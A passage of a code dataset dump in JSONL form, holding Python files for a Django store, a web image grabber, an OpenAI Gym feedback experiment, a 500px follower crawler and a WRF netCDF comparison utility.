list(Prediction.objects.aggregate(Sum('gross_sale')).values())[0]\n contex = {\n 'object': sold_items,\n 'total_qty': qty_only,\n 'total_sale': total_sale\n\n }\n return render(request, 'sold.html', contex)\n","sub_path":"predictionAPI/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"623961049","text":"from django.urls import path,include\nfrom . import views\napp_name = 'store'\nurlpatterns = [\n path('',views.home,name='home'),\n path('store/',views.store,name='store'),\n path('category_items//',views.category_items,name='category_items'),\n path('start_order/',views.startOrder,name='start_order'),\n path('item_order//',views.item_order,name='item_order'),\n path('increase_quantity//',views.increase_quantity,name='increase_quantity'),\n path('decrease_quantity//',views.decrease_quantity,name='decrease_quantity'),\n path('comfirm_payment///',views.comfirm_payment,name='comfirm_payment'),\n]\n","sub_path":"Point of Sale/store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"518116068","text":"import datetime, os, platform, re, random, time, urllib.request, urllib.parse, sys\n\nIMG_EXT_REGEX = r'\\.(JPG|JPEG|PNG|GIF)'\nIS_WINDOW = re.search(r'Windows?|CYGWIN', platform.system(), flags=re.I)\nREG_COMPILE_OBJ = type(re.compile(\"test\", re.I))\n\nclass ImageGrabberBase:\n\n\tMETHOD_GRAB_IMG = []\n\tMETHOD_NEXT_URL = []\n\tMETHOD_GRAB_IMG_PARAM = []\n\tMETHOD_NEXT_URL_PARAM = []\n\tHEADERS = {}\n\n\tdef __init__(self, url =\"\", directory=\"\", num_group=1, wait_time=10, deviate=3, overwrite=True, other_param=\"\"):\n\t\t# Validations\n\t\tif not type(num_group) is int and not type(num_group) is float:\n\t\t\traise Exception(\"The parameter 'Number of Groups' is not filled properly\")\n\t\telif not type(deviate) is int and not type(deviate) is float:\n\t\t\traise Exception(\"The parameter 'Deviate' is not filled properly\")\n\t\telif not type(wait_time) is int and not type(wait_time) is float:\n\t\t\traise Exception(\"The parameter 'Wait Time' is not filled properly\")\n\t\telif not type(directory) is str or 
len(directory.strip()) == 0:\n\t\t\traise Exception(\"The parameter 'Directory' is not filled properly\")\n\t\t\n\t\t# Set up\n\t\tself.set_url(url)\n\t\tself.num_group = num_group\n\t\tself.group_pos = 0\n\t\tself.wait_time = abs(wait_time)\n\t\tself.deviate = abs(deviate)\n\t\tself.directory = directory\n\t\tself.overwrite = overwrite\n\n\t\tself.image_url = \"\"\n\t\tself.page_content = \"\"\n\n\t\tself.settings_for_ui()\n\n\t\tif os.path.exists(self.directory):\n\t\t\tif not os.path.isdir(self.directory):\n\t\t\t\traise Exception(\"Specified directory is a file.\")\n\t\telse:\n\t\t\tos.makedirs(self.directory)\n\n\t\tif other_param:\n\t\t\ttry:\n\t\t\t\tself.handle_param_options(other_param)\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\tself.image_errors = []\n\t\tself.additional_message = \"\"\n\n\tdef set_url(self, url):\n\t\t'''\n\t\tAction performed before getting the image url.\n\t\tNormally loads the page content (string) to self.page_content.\n\t\t'''\n\n\t\tif not url.strip():\n\t\t\traise Exception(\"No url provided.\")\n\t\tif not re.search(r'https?://', url, flags=re.I):\n\t\t\turl = \"http://\" + url\n\t\tself.start_url = url\n\t\tself.url = url\n\t\tself.domain = \"{t.scheme}://{t.netloc}/\".format(t=urllib.parse.urlparse(url))\n\n\n\tdef process_grab(self):\n\t\t'''\n\t\tProcess the grabbing of images from self.url, until the following:\n\t\t\t1) There is no url to navigate to next for more images.\n\t\t\t2) The num of group (self.num_group) of images is obtained.\n\t\t\t3) An HTTPError has occurred.\n\t\t\t4) A stop signal is raised.\n\n\t\tThe process goes like this:\n\t\t\tself.pre_get_image_url()\n\t\t\twait\n\t\t\tself.get_image_url()\n\t\t\tself.post_get_image_url()\n\t\t\tself.pre_get_next_url()\n\t\t\tself.get_next_url()\n\t\t\tself.post_get_next_url()\n\t\t'''\n\n\t\tif self.progress_frame and self.progress_frame.stop_flag.is_set():\n\t\t\tsys.exit()\n\n\t\theader = {}\n\t\tif self.HEADERS:\n\t\t\titerator = None\n\t\t\tif type(self.HEADERS) == list or type(self.HEADERS) == tuple:\n\t\t\t\titerator = self.HEADERS[:]\n\t\t\telif type(self.HEADERS) == dict:\n\t\t\t\titerator = self.HEADERS.items()\n\t\t\t\n\t\t\tif iterator:\n\t\t\t\tfor (key, val) in iterator:\n\t\t\t\t\tif type(val) == list or type(val) == tuple:\n\t\t\t\t\t\theader[key] = val[random.randrange(0, len(val), 1)]\n\t\t\t\t\telse:\n\t\t\t\t\t\theader[key] = val\n\t\tself.HEADERS = header\n\n\t\tself.start_time = datetime.datetime.now()\n\n\t\tif self.progress_frame:\n\t\t\tself.progress_frame.text_display[\"text\"] = \"Started.\"\n\t\tif self.num_group == -1:\n\t\t\tself.group_pos = -2\n\t\twhile self.group_pos < self.num_group and self.url:\n\t\t\t# Get Item\n\t\t\tif not self.progress_frame or not self.progress_frame.stop_flag.is_set():\n\t\t\t\ttry:\n\t\t\t\t\tself.pre_get_image_url()\n\n\t\t\t\t\tif self.wait_time:\n\t\t\t\t\t\t# randrange requires integer bounds; +1 keeps the range valid when deviate is 0\n\t\t\t\t\t\tdeviate = random.randrange(int(self.deviate * -1000), int(self.deviate * 1000) + 1)\n\t\t\t\t\t\twait_time = deviate / 1000.0 + self.wait_time\n\t\t\t\t\t\twhile wait_time > 0:\n\t\t\t\t\t\t\tif self.progress_frame and self.progress_frame.stop_flag.is_set():\n\t\t\t\t\t\t\t\tself.additional_message += \"Stop signal was sent.\\n\"\n\t\t\t\t\t\t\t\tsave_log(self.get_log_data(), self.directory)\n\t\t\t\t\t\t\t\tsys.exit()\n\t\t\t\t\t\t\twait_time -= 0.1\n\t\t\t\t\t\t\ttime.sleep(0.1)\n\n\t\t\t\t\tobtained = self.get_image_url()\n\t\t\t\t\tself.post_get_image_url()\n\t\t\t\texcept urllib.error.HTTPError as e:\n\t\t\t\t\tself.image_errors.append((self.url, None, 
e))\n\t\t\t\t\tsave_log(self.get_log_data(), self.directory)\n\t\t\t\t\tsys.exit()\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tself.image_errors.append((self.url, None, e))\n\n\t\t\t\t# Get next url\n\t\t\t\tself.pre_get_next_url()\n\t\t\t\tself.get_next_url()\n\t\t\t\tself.post_get_next_url()\n\n\t\t\tif self.progress_frame and self.progress_frame.stop_flag.is_set():\n\t\t\t\tself.additional_message += \"Stop signal was sent.\\n\"\n\t\t\t\tself.url = \"\"\n\n\t\tif self.progress_frame:\n\t\t\tself.progress_frame.text_display[\"text\"] = \"Halted\" if self.progress_frame.stop_flag.is_set() else \"Finished\"\n\n\t\tsave_log(self.get_log_data(), self.directory)\n\t\tsys.exit()\n\n\tdef pre_get_image_url(self):\n\t\t'''\n\t\tAction performed before getting the image url.\n\t\tNormally loads the page content (string) to self.page_content.\n\t\t'''\n\n\t\tself.page_content = get_html(self.url, self.HEADERS)\n\n\tdef get_image_url(self):\n\t\t'''\n\t\tStores the image url to self.image_url.\n\t\tCan return true for successful operation, or false otherwise.\n\t\t'''\n\n\t\tself.image_url = None\n\t\turl = process_grab(self.METHOD_GRAB_IMG, self.METHOD_GRAB_IMG_PARAM, self.page_content)\n\t\tif url:\n\t\t\tself.image_url = build_url(self.domain, url)\n\t\t\treturn True\n\t\treturn False\n\n\tdef post_get_image_url(self):\n\t\t'''\n\t\tActivity performed after getting the image url.\n\t\tNormally saves the image to the specified self.directory.\n\t\t'''\n\n\t\tif self.progress_frame:\n\t\t\tif self.group_pos >= 0:\n\t\t\t\tself.progress_frame.text_display[\"text\"] = \"Saving image: %s (%d of %d)\" % (self.image_url, self.group_pos + 1, self.num_group)\n\t\t\telse:\n\t\t\t\tself.progress_frame.text_display[\"text\"] = \"Saving image: %s\" % self.image_url\n\t\tif self.image_url:\n\t\t\ttry:\n\t\t\t\tsave_image(self.image_url, self.directory, self.get_image_name(), self.overwrite)\n\t\t\texcept Exception as e:\n\t\t\t\tself.image_errors.append((self.url, self.image_url, e))\n\t\telse:\n\t\t\tself.image_errors.append((self.url, None, None))\n\n\tdef pre_get_next_url(self):\n\t\t'''\n\t\tActivity performed before getting the next url.\n\t\tCurrently unused.\n\t\t'''\n\n\t\tpass\n\n\tdef get_next_url(self):\n\t\t'''\n\t\tStores the url of the next page, or None if not found to self.url.\n\t\tCan return true for successful operation, or false otherwise.\n\t\t'''\n\n\t\turl = process_grab(self.METHOD_NEXT_URL, self.METHOD_NEXT_URL_PARAM, self.page_content)\n\t\tif url:\n\t\t\turl = build_url(self.domain, url)\n\t\tself.url = url\n\t\treturn True if url else False\n\n\tdef post_get_next_url(self):\n\t\t'''\n\t\tActivity performed after getting the next url.\n\t\tNormally increases the count.\n\t\t'''\n\t\t\n\t\tif self.progress_frame:\n\t\t\tself.progress_frame.bar.step()\n\t\tif self.num_group != -1:\n\t\t\tself.group_pos += 1\n\n\tdef get_image_name(self):\n\t\t'''\n\t\tReturns the name for the image for self.image_url.\n\t\t'''\n\n\t\tname = \"\"\n\t\tself.image_url = self.image_url.rstrip(\"/\")\n\t\tif \"/\" in self.image_url:\n\t\t\tname = self.image_url[self.image_url.rfind(\"/\") + 1:]\n\t\treturn name\n\n\tdef get_log_data(self):\n\t\t'''\n\t\tReturns a string that contains the log information regarding this run.\n\t\t'''\n\n\t\tmessage = \"Started on %s\\n\" % self.start_time.strftime('%Y-%m-%d %H:%M:%S')\n\n\t\tmessage += \"\\nStarting url: %s\\nDirectory saved: %s\\nNum of groups: %d\\nWait time: %d\\nDeviation: %d\\nOverwrite: %s\\n\" % (self.start_url, self.directory, self.num_group, 
self.wait_time, self.deviate, self.overwrite)\n\n\t\tif self.HEADERS:\n\t\t\tmessage += \"\\nThe header used for HTTP Request is:\"\n\t\t\tfor key in self.HEADERS.keys():\n\t\t\t\tmessage += \"\\nKey:'%s' \\tValue:'%s'\" % (key, self.HEADERS[key])\n\t\t\tmessage += \"\\n\"\n\n\t\tself.additional_message = self.additional_message.strip() if self.additional_message else None\n\t\tif self.additional_message:\n\t\t\tmessage += \"\\nAdditional Message:\\n%s\\n\" % self.additional_message\n\n\t\tif len(self.image_errors) > 0:\n\t\t\tmessage += \"\\nThe following errors have occurred:\\n\"\n\t\t\tfor (page_url, image_url, exception) in self.image_errors:\n\t\t\t\tmessage += \"There was an error grabbing the image from: %s\\n\" % page_url\n\t\t\t\tif image_url:\n\t\t\t\t\tmessage += \"The image url was: %s\\n\" % image_url\n\t\t\t\tif exception:\n\t\t\t\t\tmessage += \"The exception that occurred: %s\" % str(exception)\n\t\t\tmessage += \"\\n\"\n\n\t\tif self.group_pos != self.num_group:\n\t\t\tmessage += \"\\nCompleted %d out of %d groups.\\n\" % (self.group_pos, self.num_group)\n\n\t\tmessage += \"\\n%s at %s\\n\\n\" % (\"Halted\" if (self.progress_frame and self.progress_frame.stop_flag.is_set()) else \"Finished\", datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n\n\t\treturn message\n\n\tdef import_settings(self, settings):\n\t\t'''\n\t\tHandle the import of changing the settings for the base class.\n\t\tRaises an exception if the basic 4 settings are not included.\n\t\t:param settings: A dictionary that contains keywords of settings to change.\n\t\t'''\n\n\t\tif 'METHOD_GRAB_IMG' in settings and 'METHOD_NEXT_URL' in settings and 'METHOD_GRAB_IMG_PARAM' in settings and 'METHOD_NEXT_URL_PARAM' in settings:\n\t\t\tself.METHOD_GRAB_IMG = settings[\"METHOD_GRAB_IMG\"]\n\t\t\tself.METHOD_NEXT_URL = settings[\"METHOD_NEXT_URL\"]\n\t\t\tself.METHOD_GRAB_IMG_PARAM = settings[\"METHOD_GRAB_IMG_PARAM\"]\n\t\t\tself.METHOD_NEXT_URL_PARAM = settings[\"METHOD_NEXT_URL_PARAM\"]\n\t\t\tself.HEADERS = settings.get(\"HEADERS\", [])\n\t\t\treturn\n\t\traise Exception(\"The imported settings are not configured properly.\")\n\n\tdef settings_for_ui(self, progress_frame=None):\n\t\t'''\n\t\tHandles the connection for the interface between the class and the UI component.\n\t\t'''\n\n\t\tself.progress_frame = progress_frame\n\n\tdef handle_param_options(self, options):\n\t\t'''\n\t\tHandles the string argument sent to further edit the process.\n\t\t:param options: The specified string argument.\n\t\t'''\n\n\t\tpass\n\ndef get_html(url, headers):\n\t'''\n\tReturns the html content of the specified url.\n\t:param url: A string that contains the url to get content from.\n\t:param headers: A dict of (key, value) http request headers.\n\t'''\n\n\tresponse = None\n\trequest = None\n\ttry:\n\t\tif headers:\n\t\t\trequest = urllib.request.Request(url, None, headers)\n\t\telse:\n\t\t\trequest = urllib.request.Request(url)\n\t\tresponse = urllib.request.urlopen(request)\n\t\t# Read the full body before decoding so multi-byte characters are not split across chunks.\n\t\thtml = response.read().decode('utf-8')\n\t\tresponse.close()\n\t\treturn html\n\texcept Exception as e:\n\t\tif response:\n\t\t\tresponse.close()\n\t\t# HTTPError's constructor is (url, code, msg, hdrs, fp).\n\t\traise urllib.error.HTTPError(url, 0, str(e), None, None)\n\ndef save_image(image_url, path, name, overwrite):\n\t'''\n\tSaves the image under path/name\n\t:param image_url: The url containing the image to save.\n\t:param path: The path/directory to where 
to save the image.\n\t:param name: The name of the image.\n\t'''\n\n\tf = None\n\tif not name:\n\t\tname = image_url[image_url.rfind(\"/\") + 1:] if (\"/\" in image_url) else image_url\n\tpath = os.path.join(path, name)\n\tif name and image_url and (overwrite or not os.path.exists(path)):\n\t\ttry:\n\t\t\tresponse = urllib.request.urlopen(image_url)\n\t\t\timage = response.read(1024)\n\t\t\timage_part = response.read(1024)\n\t\t\twhile image_part:\n\t\t\t\timage += image_part\n\t\t\t\timage_part = response.read(1024)\n\t\t\tresponse.close() \n\t\t\tf = open(path, 'wb')\n\t\t\tf.write(image)\n\t\t\tf.close()\n\t\t\treturn True\n\t\texcept:\n\t\t\tif f:\n\t\t\t\tf.close()\n\t\t\treturn False\n\treturn False\n\ndef save_log(log_message, path):\n\t'''\n\tSaves the log of what occurred. Appends more messages into the file, if it exists.\n\t:param log_message: A string of messages of what occurred.\n\t:param path: The path where to save the log file.\n\t'''\n\n\tf = None\n\tif log_message:\n\t\ttry:\n\t\t\tpath = os.path.join(path, \"log_file\")\n\t\t\tif IS_WINDOW:\n\t\t\t\tpath += \".txt\"\n\t\t\tf = open(path, 'a')\n\t\t\tf.write(log_message)\n\t\t\tf.close()\n\t\texcept:\n\t\t\tif f:\n\t\t\t\tf.close()\n\ndef build_url(domain, component):\n\t'''\n\tReturns a url of domain+component if component is a path/query for domain.\n\tIf component is a standalone url, return that.\n\t:param domain: The base url to add to component\n\t:param component: The url to add to the domain of the site.\n\t'''\n\n\tparsed_url = urllib.parse.urlparse(component)\n\tif parsed_url.netloc:\n\t\treturn component if parsed_url.scheme else (\"http://%s\" % component)\n\telse:\n\t\treturn \"%s/%s\" % (domain.rstrip(\"/\"), component.lstrip(\"/\"))\n\ndef process_grab(methods, params, content):\n\t'''\n\tReturns a particular url from content depending on particular methods.\n\t:param methods: Method for how to grab a url.\n\t:param params: Parameter(s) for the method(s).\n\t:param content: The content to extract information from.\n\t'''\n\n\tresult = None\n\n\tif type(methods) is list or type(methods) is tuple:\n\t\t# List of methods and params to use\n\t\ti = 0\n\t\twhile i < len(methods):\n\t\t\tresult = process_grab_call(methods[i], params[i], content)\n\t\t\tif result:\n\t\t\t\treturn result\n\t\t\ti += 1\n\telse:\n\t\t# methods and params are not lists, but particular objects\n\t\tresult = process_grab_call(methods, params, content)\n\treturn result\n\ndef process_grab_call(finder, param, content):\n\t'''\n\tReturns a particular url from content depending on the given finder.\n\t:param finder: Method for how to grab a url.\n\t:param param: Parameter(s) for the finder.\n\t:param content: The content to extract information from.\n\t'''\n\n\tresult = None\n\n\t# finder is a function\n\t# param is passed to finder, if applicable\n\tif callable(finder):\n\t\tif param is None:\n\t\t\tresult = finder(content)\n\t\telif type(param) is list or type(param) is tuple:\n\t\t\tresult = finder(content, *param)\n\t\telif type(param) is dict:\n\t\t\tresult = finder(content, **param)\n\t\telse:\n\t\t\tresult = finder(content, param)\n\n\t# finder is a list/tuple with item(s), 0 is regex pattern and 1 is flags\n\t# param is the group for regex pattern return, or 1 if not provided\n\telif type(finder) is list or type(finder) is tuple:\n\t\treg_compile = None\n\t\tif len(finder) > 1:\n\t\t\treg_compile = re.compile(finder[0], finder[1])\n\t\telif len(finder) == 1:\n\t\t\treg_compile = 
re.compile(finder[0])\n\t\tif reg_compile:\n\t\t\tresult = reg_compile.search(content)\n\t\t\tif result and (type(param) is int or (type(param) is str and param.isnumeric())):\n\t\t\t\tresult = result.group(int(param))\n\t\t\telif result:\n\t\t\t\tresult = result.group(1)\n\t\t\telse:\n\t\t\t\tresult = None\n\n\t# finder is a string that represents a regex pattern\n\t# param is the group for regex pattern return, or 1 if not provided\n\telif type(finder) is str:\n\t\treg_compile = re.compile(finder)\n\t\tresult = reg_compile.search(content)\n\t\tif result and (type(param) is int or (type(param) is str and param.isnumeric())):\n\t\t\tresult = result.group(int(param))\n\t\telif result:\n\t\t\tresult = result.group(1)\n\t\telse:\n\t\t\tresult = None\n\n\t# finder is a compiled regex obj\n\t# param is the group for regex pattern return, or 1 if not provided\n\telif type(finder) == REG_COMPILE_OBJ:\n\t\tresult = finder.search(content)\n\t\tif result and (type(param) is int or (type(param) is str and param.isnumeric())):\n\t\t\tresult = result.group(int(param))\n\t\telif result:\n\t\t\tresult = result.group(1)\n\t\telse:\n\t\t\tresult = None\n\n\treturn result","sub_path":"ImageGrabberBase.py","file_name":"ImageGrabberBase.py","file_ext":"py","file_size_in_byte":14772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"490630978","text":"# FirstOpenAIGym.py\n\nimport gym\nimport os\nimport six\nimport expr_configurator\nfrom expr_configurator import ExperimentConfigurator\nfrom input import user_input\nfrom experiment_saver import counter_saver\nfrom random import randint\n\n\nclass OpenAIGymExperiment:\n def __init__(self):\n self.expr_log_dir = ExperimentConfigurator.getTrainingAndGeneralExprConfig('expr_log_dir')\n self.n_episode = ExperimentConfigurator.getTrainingAndGeneralExprConfig('n_episode')\n self.expr_identifier = ExperimentConfigurator.getTrainingAndGeneralExprConfig('experiment_identifier')\n self.feedback_source = ExperimentConfigurator.getTrainingAndGeneralExprConfig('feedback_source')\n self.image_dir = self.expr_log_dir + '/images'\n\n def run_episodes(self):\n user_input_module = user_input.UserInputModule(is_asyn=True)\n env = gym.make('Assault-v0')\n\n # create images directory\n image_dir = self.image_dir\n if not os.path.exists(image_dir):\n os.makedirs(image_dir)\n\n collected_feedback = {}\n for i_episode in range(self.n_episode):\n env.reset()\n for t in range(10000):\n env.render()\n\n # collect human feedback\n feedback = 0\n if self.feedback_source == expr_configurator.HUMAN_FEEDBACK:\n action = env.action_space.sample()\n human_feedback = user_input_module.getInput()\n if human_feedback is None:\n feedback = 0\n else:\n print(human_feedback)\n if human_feedback == 'a':\n feedback = -1\n elif human_feedback == 's':\n feedback = 1\n else:\n feedback = 0\n # get agent feedback\n else:\n action = env.action_space.sample()\n feedback = randint(-1, 1)\n\n observation, reward, done, info = env.step(action)\n observation_identifier = self.expr_identifier + '_' + str(i_episode).zfill(5) + '_' + str(t).zfill(6)\n env.env.ale.saveScreenPNG(six.b(self.image_dir + '/' + observation_identifier + '.png'))\n collected_feedback[observation_identifier] = str(action) + ',' + str(reward) + ',' + str(feedback)\n\n if done:\n print(\"Episode finished after {} time steps\".format(t + 1))\n break\n\n counter_saver.saveDictToFile(self.expr_log_dir + '/' + 'collected_feedback.txt', collected_feedback)\n env.close()\n 
user_input_module.stop()\n\n\ndef main():\n    pass\n\n\nif __name__ == '__main__':\n    main()\n\n","sub_path":"Week 3/Experiment/environment/FirstOpenAIGym.py","file_name":"FirstOpenAIGym.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"11041278","text":"import requests\nimport threading\nfrom redis import StrictRedis\nimport pymongo\n\n############### mongo section ###############\nDATABASE_IP = '127.0.0.1'\nDATABASE_PORT = 27017\nDATABASE_NAME = 'sun'\nclient = pymongo.MongoClient(DATABASE_IP, DATABASE_PORT)\ndb = client.sun\ndb.authenticate('dba', 'dba')\ncollection = db['500px']\n############# mongo section end #############\n\n############### redis section ###############\nredis = StrictRedis(host='localhost', port=6379, db=1, decode_responses=True)\n############# redis section end #############\n\n############## global parameters ###############\nSTART_URL = 'https://500px.me/community/v2/user/indexInfo?queriedUserId={}' # entry url\nCOMMENT = 'https://500px.me/community/res/relation/{}/follow?startTime=&page={}&size=100&type=json'\nHEADERS = {\n    'Accept': 'application/json',\n    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36',\n    'X-Requested-With': 'XMLHttpRequest'\n}\nneed_crawlids = [] # userids waiting to be crawled\nlock = threading.Lock()\n############ global parameters end #############\n\ndef get_followee():\n    try:\n        res = requests.get(START_URL.format('5769e51a04209a9b9b6a8c1e656ff9566'), headers=HEADERS, timeout=3)\n        data = res.json()\n        if data:\n            totle = int(data['data']['userFolloweeCount']) # number of followees\n            userid = data['data']['id'] # user ID from the response\n            return {\n                'userid': userid,\n                'totle': totle\n            }\n    except Exception as e:\n        print('Failed to fetch data')\n        print(e)\n\nclass Product(threading.Thread):\n    def __init__(self):\n        threading.Thread.__init__(self)\n        self._headers = HEADERS\n\n    def get_follows(self, userid, totle):\n        try:\n            res = requests.get(COMMENT.format(userid, totle), headers=HEADERS, timeout=3)\n            data = res.json()\n            if data:\n                for item in data:\n                    yield {\n                        'userid': item['id'],\n                        'totle': item['userFolloweeCount']\n                    }\n        except Exception as e:\n            print('Error info')\n            print(e)\n            yield from self.get_follows(userid, totle) # retry this page\n\n    def run(self):\n        while 1:\n            global need_crawlids\n            if lock.acquire():\n                if len(need_crawlids) == 0:\n                    lock.release() # release before retrying, otherwise the next acquire deadlocks\n                    continue\n                data = need_crawlids[0]\n                del need_crawlids[0]\n                lock.release()\n            if data['totle'] == 0:\n                continue\n            for page in range(1, data['totle'] // 100 + 2): # '//' is floor division: the integer part of the quotient, rounded down\n                for i in self.get_follows(data['userid'], page):\n                    if lock.acquire():\n                        need_crawlids.append(i)\n                        lock.release()\n                    self.save_redis(i) # store in redis\n\n    def save_redis(self, data):\n        redis.setnx(data['userid'], data['totle'])\n\nclass Consumer(threading.Thread):\n    def __init__(self):\n        threading.Thread.__init__(self)\n    \n    def run(self):\n        while 1:\n            key = redis.randomkey() # fetch a random key\n            if key:\n                # delete the fetched key\n                redis.delete(key)\n                self.get_info(key)\n\n    def get_info(self, key):\n        try:\n            res = requests.get(START_URL.format(key), headers=HEADERS, timeout=3)\n            data = res.json()\n            if data['status'] == 200:\n                collection.insert(data['data']) # insert into mongodb\n        except Exception as e:\n            print(e)\n            return\n\n\nif __name__ == '__main__':\n    start = get_followee()\n    need_crawlids.append(start)\n\n    p = Product()\n    p.start()\n\n    for i in range(1, 5):\n        c = Consumer()\n        
c.start()","sub_path":"500px/500px.py","file_name":"500px.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"33904382","text":"# WRF-CMake Automated Testing Suite (WATS) (https://github.com/WRF-CMake/wats).\n# Copyright 2018 M. Riechert and D. Meyer. Licensed under the MIT License.\n\nfrom typing import Tuple, Union, List, Set, Optional\nimport logging\nfrom collections import namedtuple\n\nimport numpy as np\nfrom numpy import ma\nimport netCDF4 as nc\nimport wrf\n\nfrom wats.util import get_log_level\n\ndef read_var(ds: nc.Dataset, name: str, time_idx: Optional[int]=None) -> np.array:\n if name == 'KE':\n u = wrf.getvar(ds, 'U', time_idx, squeeze=False).values\n v = wrf.getvar(ds, 'V', time_idx, squeeze=False).values\n w = wrf.getvar(ds, 'W', time_idx, squeeze=False).values\n dims = ds.dimensions\n bottom_top = dims['bottom_top'].size\n south_north = dims['south_north'].size\n west_east = dims['west_east'].size\n u = u[:,:bottom_top,:south_north,:west_east]\n v = v[:,:bottom_top,:south_north,:west_east]\n w = w[:,:bottom_top,:south_north,:west_east]\n var = 0.5 * (u**2 + v**2 + w**2)\n else:\n try:\n var = wrf.getvar(ds, name, time_idx, squeeze=False).values\n except:\n var = ds.variables[name][:]\n if time_idx is not None:\n var = var[time_idx:time_idx+1]\n return var\n\ndef calc_rel_error(var_ref: np.array, var_trial: np.array) -> np.array:\n ref_zeros = var_ref == 0\n trial_nonzeros_cnt = np.count_nonzero(var_trial[ref_zeros])\n if trial_nonzeros_cnt > 0:\n raise ValueError(f'Reference contains {trial_nonzeros_cnt} points with zero where trial is non-zero')\n\n with np.errstate(divide='ignore'):\n rel_error = (var_trial - var_ref) / var_ref\n rel_error[ref_zeros] = 0\n\n return rel_error\n\ndef calc_rel_error_range_normalised(var_ref: np.array, var_trial: np.array) -> np.array:\n err = var_trial - var_ref\n ref_range = calc_range(var_ref)\n\n if ref_range == 0:\n raise ValueError('ref_range == 0')\n\n rel_error = err / ref_range\n return rel_error\n\ndef calc_rel_error_iqr_normalised(var_ref: np.array, var_trial: np.array) -> np.array:\n err = var_trial - var_ref\n ref_iqr = calc_iqr(var_ref)\n\n if ref_iqr == 0:\n raise ValueError('ref_iqr == 0')\n\n rel_error = err / ref_iqr\n return rel_error\n\ndef calc_range(arr: np.array) -> float:\n range_ = np.max(arr) - np.min(arr)\n return range_\n\ndef calc_iqr(arr: np.array) -> float:\n q1, q3 = np.percentile(arr, [25, 75])\n iqr = q3 - q1\n return iqr\n\ndef compare_categorical_var(var1: np.array, var2: np.array, name: str, tol_percentage: float) -> bool:\n mismatches = np.count_nonzero(var1 != var2)\n ratio = mismatches / var1.size\n equal = ratio*100 <= tol_percentage\n logging.log(get_log_level(equal), \n \"{}: category mismatches {:.4f}% ({} of {} pixels) {}\".format(\n name,\n ratio*100, mismatches, var1.size,\n ('' if equal else ' -> ABOVE THRESHOLD')))\n return equal\n\ndef compare_continuous_var(var_ref: np.array, var_trial: np.array, name: str, tol: float, mean: bool) -> bool:\n try:\n rel_error = calc_rel_error(var_ref, var_trial)\n except ValueError as e:\n logging.error('{}: {}'.format(name, e))\n return False\n\n rel_error_abs = abs(rel_error)\n\n max_rel_diff = rel_error_abs.max()\n mean_rel_diff = rel_error_abs.mean()\n \n if mean:\n equal = mean_rel_diff <= tol\n extra = ''\n else:\n above_thresh = rel_error_abs > tol\n above_thresh_count = np.count_nonzero(above_thresh)\n equal = above_thresh_count == 0\n extra = '' if equal 
else ' ({} pixels)'.format(above_thresh_count)\n\n    logging.info(\n        '{}: reference mean={:.3e} stddev={:.3e} min={:.3e} max={:.3e}'.format(\n            name, var_ref.mean(), var_ref.std(), var_ref.min(), var_ref.max()))\n\n    logging.info(\n        '{}: trial mean={:.3e} stddev={:.3e} min={:.3e} max={:.3e}'.format(\n            name, var_trial.mean(), var_trial.std(), var_trial.min(), var_trial.max()))\n\n    logging.log(get_log_level(equal), \n        \"{}: relative error max={:.4f}% mean={:.4f}%{}\".format(\n            name,\n            max_rel_diff*100, mean_rel_diff*100,\n            ('' if equal else ' -> ABOVE THRESHOLD') + extra))\n\n    return equal\n\ndef compare_var(var_ref: np.array, var_trial: np.array, \n                name: str, is_categorical: bool,\n                no_data: Optional[Union[float,int]],\n                tol: float, mean=False) -> bool:\n    if var_ref.shape != var_trial.shape:\n        raise RuntimeError(f'Shape mismatch for {name}: {var_ref.shape} != {var_trial.shape}')\n    \n    is_numeric = np.issubdtype(var_ref.dtype, np.number)\n\n    if no_data is not None and is_numeric:\n        var_ref = ma.masked_equal(var_ref, no_data)\n        var_trial = ma.masked_equal(var_trial, no_data)\n        assert (var_ref.mask == var_trial.mask).all()\n        if var_ref.mask.all():\n            logging.error(f'{name} has only missing values!')\n            return False\n\n    if not is_numeric:\n        if (var_ref != var_trial).any():\n            logging.error(f'Non-numeric mismatch for {name}: {var_ref} != {var_trial}')\n            return False\n        return True\n    elif is_categorical:\n        return compare_categorical_var(var_ref, var_trial, name, tol)\n    else:\n        return compare_continuous_var(var_ref, var_trial, name, tol, mean)\n\ndef compare(path_ref: str, path_trial: str, \n            var_names_categorical: List[str], \n            var_names_continuous: List[str],\n            no_data: Optional[Union[float,int]],\n            tol_continuous: float, tol_categorical: float,\n            mean=False) -> bool:\n    nc_ref = nc.Dataset(path_ref, 'r')\n    nc_trial = nc.Dataset(path_trial, 'r')\n\n    var_names = {var_name: True for var_name in var_names_categorical}\n    var_names.update({var_name: False for var_name in var_names_continuous})\n\n    file_equal = True\n    for var_name, is_categorical in sorted(var_names.items()):\n        try:\n            var_ref = read_var(nc_ref, var_name)\n        except Exception as e:\n            logging.info(f'\"{var_name}\" not found or problem opening: {e}. 
